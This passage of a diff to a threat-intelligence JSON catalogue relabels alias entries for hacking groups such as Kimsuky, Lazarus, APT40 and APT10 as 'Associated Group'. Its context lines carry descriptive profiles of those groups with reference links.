"95a17f0a-d6ca-4d82-add7-96f97104a471", - "value": "Mirage" + "value": "Mirage - Associated Group" }, { "description": "[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]", @@ -5408,7 +5408,7 @@ } ], "uuid": "85d23b10-4d88-41b5-a1e6-628faf4dfcdd", - "value": "GREF" + "value": "GREF - Associated Group" }, { "description": "[[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]", @@ -5422,7 +5422,7 @@ } ], "uuid": "53e4969e-6d5f-447a-b589-cf4ec546985b", - "value": "RoyalAPT" + "value": "RoyalAPT - Associated Group" }, { "description": "[[Microsoft NICKEL December 2021](https://app.tidalcyber.com/references/29a46bb3-f514-4554-ad9c-35f9a5ad9870)]", @@ -5436,7 +5436,7 @@ } ], "uuid": "dac81780-75d0-4e20-91a5-d6f9f4e21de3", - "value": "NICKEL" + "value": "NICKEL - Associated Group" }, { "description": "[Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) is a threat group attributed to actors operating out of China. [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.[[Mandiant Operation Ke3chang November 2014](https://app.tidalcyber.com/references/bb45cf96-ceae-4f46-a0f5-08cd89f699c9)][[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)][[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)][[Microsoft NICKEL December 2021](https://app.tidalcyber.com/references/29a46bb3-f514-4554-ad9c-35f9a5ad9870)]", @@ -5584,7 +5584,7 @@ } ], "uuid": "11901dae-ceb9-4469-8529-f517d6489ca8", - "value": "STOLEN PENCIL" + "value": "STOLEN PENCIL - Associated Group" }, { "description": "[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)][[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]", @@ -5598,7 +5598,7 @@ } ], "uuid": "c6cbcc71-4931-460b-8676-b638be841995", - "value": "Thallium" + "value": "Thallium - Associated Group" }, { "description": "[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)][[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]", @@ -5612,7 +5612,7 @@ } ], "uuid": "983f8775-5730-4400-92b3-ef3643b2b33c", - "value": "Black Banshee" + "value": "Black Banshee - Associated Group" }, { "description": "[[Zdnet Kimsuky Dec 2018](https://app.tidalcyber.com/references/b17acdc3-0163-4c98-b5fb-a457a7e6b58d)][[ThreatConnect Kimsuky September 2020](https://app.tidalcyber.com/references/45d64462-2bed-46e8-ac52-9d4914608a93)][[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]", @@ -5626,7 +5626,7 @@ } ], "uuid": "983d7efc-068e-41b2-96da-524af88985a8", - "value": "Velvet Chollima" + "value": "Velvet Chollima - Associated Group" }, { "description": "[Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.[[EST Kimsuky April 2019](https://app.tidalcyber.com/references/8e52db6b-5ac3-448a-93f6-96a21787a346)][[BRI Kimsuky April 2019](https://app.tidalcyber.com/references/b72dd3a1-62ca-4a05-96a8-c4bddb17db50)][[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)][[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)][[CISA AA20-301A Kimsuky](https://app.tidalcyber.com/references/685aa213-7902-46fb-b90a-64be5c851f73)]\n\n[Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).[[Netscout Stolen Pencil Dec 2018](https://app.tidalcyber.com/references/6d3b31da-a784-4da0-91dd-b72c04fd520a)][[EST Kimsuky SmokeScreen April 2019](https://app.tidalcyber.com/references/15213a3c-1e9f-47fa-9864-8ef2707c7fb6)][[AhnLab Kimsuky Kabar Cobra Feb 2019](https://app.tidalcyber.com/references/4035e871-9291-4d7f-9c5f-d8482d4dc8a7)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.", @@ -5689,7 +5689,7 @@ } ], "uuid": "fc95e9b7-ae40-4a2f-b1f6-a42facc3c237", - "value": "DEV-0537" + "value": "DEV-0537 - Associated Group" }, { "description": "[LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.[[BBC LAPSUS Apr 2022](https://app.tidalcyber.com/references/6c9f4312-6c9d-401c-b20f-12ce50c94a96)][[MSTIC DEV-0537 Mar 2022](https://app.tidalcyber.com/references/a9ce7e34-6e7d-4681-9869-8e8f2b5b0390)][[UNIT 42 LAPSUS Mar 2022](https://app.tidalcyber.com/references/50f4c1ed-b046-405a-963d-a113324355a3)]", @@ -5724,7 +5724,7 @@ } ], "uuid": "df5caef8-2e25-4ddd-ae58-2c9ad119834d", - "value": "HIDDEN COBRA" + "value": "HIDDEN COBRA - Associated Group" }, { "description": "[[CrowdStrike Labyrinth Chollima Feb 2022](https://app.tidalcyber.com/references/ffe31bbf-a40d-4285-96a0-53c54298a680)]", @@ -5738,7 +5738,7 @@ } ], "uuid": "a7be1337-efab-48a8-9bf4-6f300291d150", - "value": "Labyrinth Chollima" + "value": "Labyrinth Chollima - Associated Group" }, { "description": "[[US-CERT HIDDEN COBRA June 2017](https://app.tidalcyber.com/references/8e57cea3-ee37-4507-bb56-7445050ec8ca)]", @@ -5752,7 +5752,7 @@ } ], "uuid": "618bd388-b295-4076-a63e-c1e2515dab4e", - "value": "Guardians of Peace" + "value": "Guardians of Peace - Associated Group" }, { "description": "[[Microsoft ZINC disruption Dec 2017](https://app.tidalcyber.com/references/99831838-fc8f-43fa-9c87-6ccdf5677c34)]", @@ -5766,7 +5766,7 @@ } ], "uuid": "4fc58da4-8398-43f9-b037-fd873ed5864e", - "value": "ZINC" + "value": "ZINC - Associated Group" }, { "description": "[[Secureworks NICKEL ACADEMY Dec 2017](https://app.tidalcyber.com/references/aa7393ad-0760-4f27-a068-17beba17bbe3)]", @@ -5780,7 +5780,7 @@ } ], "uuid": "b7b671c3-2339-4521-a12d-b57821ad5c12", - "value": "NICKEL ACADEMY" + "value": "NICKEL ACADEMY - Associated Group" }, { "description": "", @@ -5796,7 +5796,7 @@ } ], "uuid": "972c0eea-6037-4aac-ac22-e1e991898dcb", - "value": "Diamond Sleet" + "value": "Diamond Sleet - Associated Group" }, { "description": "[Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.[[US-CERT HIDDEN COBRA June 2017](https://app.tidalcyber.com/references/8e57cea3-ee37-4507-bb56-7445050ec8ca)][[Treasury North Korean Cyber Groups September 2019](https://app.tidalcyber.com/references/54977bb2-2929-41d7-bdea-06d39dc76174)] The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. [[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups, such as [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46), [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66), [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b), and [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1). ", @@ -5888,7 +5888,7 @@ } ], "uuid": "044d8fd0-faad-4e9f-bc5a-807e7147a331", - "value": "Raspite" + "value": "Raspite - Associated Group" }, { "description": "[Leafminer](https://app.tidalcyber.com/groups/b5c28235-d441-40d9-8da2-d49ba2f2568b) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. [[Symantec Leafminer July 2018](https://app.tidalcyber.com/references/01130af7-a2d4-435e-8790-49933e041451)]", @@ -5938,7 +5938,7 @@ } ], "uuid": "e7a109ad-fa21-4fcf-a1fb-2a497146db2b", - "value": "Kryptonite Panda" + "value": "Kryptonite Panda - Associated Group" }, { "description": "[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[SecureWorks BRONZE MOHAWK n.d.](https://app.tidalcyber.com/references/b741fe9a-4b08-44b9-b6e7-5988eee486a3)]", @@ -5952,7 +5952,7 @@ } ], "uuid": "5b71f978-8056-47a9-b4f9-d2520fc396a0", - "value": "BRONZE MOHAWK" + "value": "BRONZE MOHAWK - Associated Group" }, { "description": "FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)][[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)][[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]", @@ -5966,7 +5966,7 @@ } ], "uuid": "06d1c9bb-8951-4e14-a775-9a248d6390cf", - "value": "APT40" + "value": "APT40 - Associated Group" }, { "description": "[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[Accenture MUDCARP March 2019](https://app.tidalcyber.com/references/811d433d-27a4-4411-8ec9-b3a173ba0033)]", @@ -5980,7 +5980,7 @@ } ], "uuid": "97a136d2-2bb1-44ed-a33b-cf87374b24a7", - "value": "MUDCARP" + "value": "MUDCARP - Associated Group" }, { "description": "[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[MSTIC GADOLINIUM September 2020](https://app.tidalcyber.com/references/ee352214-421f-4778-ac28-949142a8ef2a)]", @@ -5994,7 +5994,7 @@ } ], "uuid": "82ac97dc-8c3e-4fd1-a7a1-76b8513143e1", - "value": "Gadolinium" + "value": "Gadolinium - Associated Group" }, { "description": "[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]", @@ -6008,7 +6008,7 @@ } ], "uuid": "c9c9a804-2635-4a47-b63c-9ad5363454a3", - "value": "TEMP.Jumper" + "value": "TEMP.Jumper - Associated Group" }, { "description": "[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)][[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]", @@ -6022,7 +6022,7 @@ } ], "uuid": "58f19fca-8c3b-424a-8e1d-cb3996f36417", - "value": "TEMP.Periscope" + "value": "TEMP.Periscope - Associated Group" }, { "description": "[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)] Active since at least 2009, [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)][[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]", @@ -6109,7 +6109,7 @@ } ], "uuid": "d35be61a-d6d9-4572-8d1f-60367e982f88", - "value": "Water Selkie" + "value": "Water Selkie - Associated Group" }, { "description": "This object represents the LockBit Ransomware-as-a-Service (\"RaaS\") apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects.\n\nRansomware labeled \"LockBit\" was first observed in 2020. LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (\"CISA\"), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware's predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (March 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]\n\nSince emerging in 2020, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world. In June 2023, the U.S. Federal Bureau of Investigation reported it had identified 1,700 LockBit attacks since 2020.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (576 associated with the LockBit 2.0 variant and 394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims, more than double the number of the next threat (Clop, with 179 victims).[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] CISA reported in June 2023 that U.S. ransoms paid to LockBit since January 2020 totaled $91 million.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]\n\nLockBit affiliate operators are known to use a wide variety of techniques during their attacks. Initial access for LockBit infections has occurred via most methods (including a number of vulnerability exploits), and operators are known to abuse a range of free and open-source software tools for a variety of post-exploitation activities. In addition to victim data encryption, LockBit actors routinely exfiltrate victim data and threaten to leak this data for extortion purposes.\n\n**Related Vulnerabilities**: CVE-2021-22986, CVE-2023-0669, CVE-2023-27350, CVE-2021-44228, CVE-2021-22986, CVE-2020-1472, CVE-2019-0708, CVE-2018-13379[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", @@ -6237,7 +6237,7 @@ } ], "uuid": "68a87557-6166-4fd7-8a18-4a4e43f9b949", - "value": "Spring Dragon" + "value": "Spring Dragon - Associated Group" }, { "description": "[[Accenture Dragonfish Jan 2018](https://app.tidalcyber.com/references/f692c6fa-7b3a-4d1d-9002-b1a59f7116f4)]", @@ -6251,7 +6251,7 @@ } ], "uuid": "e2890e51-1bc8-4302-9251-149a3f547d36", - "value": "DRAGONFISH" + "value": "DRAGONFISH - Associated Group" }, { "description": "[Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52) is a threat group that has targeted government and military organizations in Southeast Asia. [[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)]", @@ -6312,7 +6312,7 @@ } ], "uuid": "4656c093-80f5-4f33-a695-09180101d3d9", - "value": "APT-C-43" + "value": "APT-C-43 - Associated Group" }, { "description": "[[Cylance Machete Mar 2017](https://app.tidalcyber.com/references/92a9a311-1e0b-4819-9856-2dfc8dbfc08d)]", @@ -6326,7 +6326,7 @@ } ], "uuid": "b5f7c7c6-f079-4e6e-95a5-4fde667b9705", - "value": "El Machete" + "value": "El Machete - Associated Group" }, { "description": "[Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.[[Cylance Machete Mar 2017](https://app.tidalcyber.com/references/92a9a311-1e0b-4819-9856-2dfc8dbfc08d)][[Securelist Machete Aug 2014](https://app.tidalcyber.com/references/fc7be240-bd15-4ec4-bc01-f8891d7210d9)][[ESET Machete July 2019](https://app.tidalcyber.com/references/408d5e33-fcb6-4d21-8be9-7aa5a8bd3385)][[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]", @@ -6398,7 +6398,7 @@ } ], "uuid": "618f578f-a73b-4f47-b123-8c3877325675", - "value": "Phosphorus" + "value": "Phosphorus - Associated Group" }, { "description": "[[Proofpoint TA453 March 2021](https://app.tidalcyber.com/references/5ba4217c-813b-4cc5-b694-3a4dcad776e4)][[Proofpoint TA453 July2021](https://app.tidalcyber.com/references/a987872f-2176-437c-a38f-58676b7b12de)][[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]", @@ -6412,7 +6412,7 @@ } ], "uuid": "69d9316e-daa7-4fe4-86e0-c79c4ab27c5e", - "value": "TA453" + "value": "TA453 - Associated Group" }, { "description": "[[ClearSky Charming Kitten Dec 2017](https://app.tidalcyber.com/references/23ab1ad2-e9d4-416a-926f-6220a59044ab)][[Eweek Newscaster and Charming Kitten May 2014](https://app.tidalcyber.com/references/a3407cd2-d579-4d64-8f2e-162c31a99534)][[ClearSky Kittens Back 2 Oct 2019](https://app.tidalcyber.com/references/f5114978-2528-4199-a586-0158c5f8a138)][[ClearSky Kittens Back 3 August 2020](https://app.tidalcyber.com/references/a10c6a53-79bb-4454-b444-cfb9136ecd36)][[Proofpoint TA453 March 2021](https://app.tidalcyber.com/references/5ba4217c-813b-4cc5-b694-3a4dcad776e4)][[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]", @@ -6426,7 +6426,7 @@ } ], "uuid": "2a379f9c-0c8b-4066-8131-dfc6aad03b30", - "value": "Charming Kitten" + "value": "Charming Kitten - Associated Group" }, { "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).[[Unit 42 Magic Hound Feb 2017](https://app.tidalcyber.com/references/f1ef9868-3ddb-4289-aa92-481c35517920)][[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)]", @@ -6440,7 +6440,7 @@ } ], "uuid": "1701d47b-d0ad-47dd-965e-0f50737c34ef", - "value": "Newscaster" + "value": "Newscaster - Associated Group" }, { "description": "[[Secureworks COBALT ILLUSION Threat Profile](https://app.tidalcyber.com/references/8d9a5b77-2516-4ad5-9710-4c8165df2882)]", @@ -6454,7 +6454,7 @@ } ], "uuid": "9a6d6b98-17f3-445d-94dc-fb6e942245c3", - "value": "COBALT ILLUSION" + "value": "COBALT ILLUSION - Associated Group" }, { "description": "[[IBM ITG18 2020](https://app.tidalcyber.com/references/523b7a1e-88ef-4440-a7b3-3fd0b8d5e199)]", @@ -6468,7 +6468,7 @@ } ], "uuid": "ae8cdb8b-d572-427b-93ad-195a3d41a08a", - "value": "ITG18" + "value": "ITG18 - Associated Group" }, { "description": "[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)][[Certfa Charming Kitten January 2021](https://app.tidalcyber.com/references/c38a8af6-3f9b-40c3-8122-a2a51eb50664)][[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]", @@ -6482,7 +6482,7 @@ } ], "uuid": "b908442f-7e76-48d9-ba6f-448ce1e8b071", - "value": "APT35" + "value": "APT35 - Associated Group" }, { "description": "[Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)][[ClearSky Kittens Back 3 August 2020](https://app.tidalcyber.com/references/a10c6a53-79bb-4454-b444-cfb9136ecd36)][[Certfa Charming Kitten January 2021](https://app.tidalcyber.com/references/c38a8af6-3f9b-40c3-8122-a2a51eb50664)][[Secureworks COBALT ILLUSION Threat Profile](https://app.tidalcyber.com/references/8d9a5b77-2516-4ad5-9710-4c8165df2882)][[Proofpoint TA453 July2021](https://app.tidalcyber.com/references/a987872f-2176-437c-a38f-58676b7b12de)]", @@ -6651,7 +6651,7 @@ } ], "uuid": "54b7d2ff-e1e3-49f7-8cb5-a9089b9f9807", - "value": "Stone Panda" + "value": "Stone Panda - Associated Group" }, { "description": "[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)][[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]", @@ -6665,7 +6665,7 @@ } ], "uuid": "3eb5f80a-0069-4f3f-9c25-6139254b307c", - "value": "CVNX" + "value": "CVNX - Associated Group" }, { "description": "[[Symantec Cicada November 2020](https://app.tidalcyber.com/references/28a7bbd8-d664-4234-9311-2befe0238b5b)]", @@ -6679,7 +6679,7 @@ } ], "uuid": "f7cac76e-8c1f-43ca-8769-9fb573fe6328", - "value": "Cicada" + "value": "Cicada - Associated Group" }, { "description": "[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]", @@ -6693,7 +6693,7 @@ } ], "uuid": "30f0cb4f-7bb5-4794-8843-bd925bafeb59", - "value": "POTASSIUM" + "value": "POTASSIUM - Associated Group" }, { "description": "[[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)][[Accenture Hogfish April 2018](https://app.tidalcyber.com/references/c8e9fee1-9981-499f-a62f-ffe59f4bb1e7)][[FireEye APT10 Sept 2018](https://app.tidalcyber.com/references/5f122a27-2137-4016-a482-d04106187594)][[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[Symantec Cicada November 2020](https://app.tidalcyber.com/references/28a7bbd8-d664-4234-9311-2befe0238b5b)]", @@ -6707,7 +6707,7 @@ } ], "uuid": "f18b971c-5d70-4884-8069-983324946274", - "value": "APT10" + "value": "APT10 - Associated Group" }, { "description": "[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)][[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]", @@ -6721,7 +6721,7 @@ } ], "uuid": "31fc92e8-3de5-47a2-a63e-37cb82fd8bdb", - "value": "Red Apollo" + "value": "Red Apollo - Associated Group" }, { "description": "[[Accenture Hogfish April 2018](https://app.tidalcyber.com/references/c8e9fee1-9981-499f-a62f-ffe59f4bb1e7)]", @@ -6735,7 +6735,7 @@ } ], "uuid": "cdd6a361-e7b5-48a0-a866-96ccc79f9dda", - "value": "HOGFISH" + "value": "HOGFISH - Associated Group" }, { "description": "[menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]\n\n[menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.[[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)][[Crowdstrike CrowdCast Oct 2013](https://app.tidalcyber.com/references/2062a229-58b3-4610-99cb-8907e7fbb350)][[FireEye Poison Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)][[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)][[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)][[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]", @@ -6911,7 +6911,7 @@ } ], "uuid": "d33e9c35-2176-44c8-8d5e-77ed5de472b2", - "value": "Operation Molerats" + "value": "Operation Molerats - Associated Group" }, { "description": "[[DustySky](https://app.tidalcyber.com/references/b9e0770d-f54a-4ada-abd1-65c45eee00fa)][[Kaspersky MoleRATs April 2019](https://app.tidalcyber.com/references/38216a34-5ffd-4e79-80b1-7270743b728e)][[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]", @@ -6925,7 +6925,7 @@ } ], "uuid": "7399d632-1b1d-47da-8f8e-0f8decd62bf7", - "value": "Gaza Cybergang" + "value": "Gaza Cybergang - Associated Group" }, { "description": "[Molerats](https://app.tidalcyber.com/groups/679b7b6b-9659-4e56-9ffd-688a6fab01b6) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States.[[DustySky](https://app.tidalcyber.com/references/b9e0770d-f54a-4ada-abd1-65c45eee00fa)][[DustySky2](https://app.tidalcyber.com/references/4a3ecdec-254c-4eb4-9126-f540bb21dffe)][[Kaspersky MoleRATs April 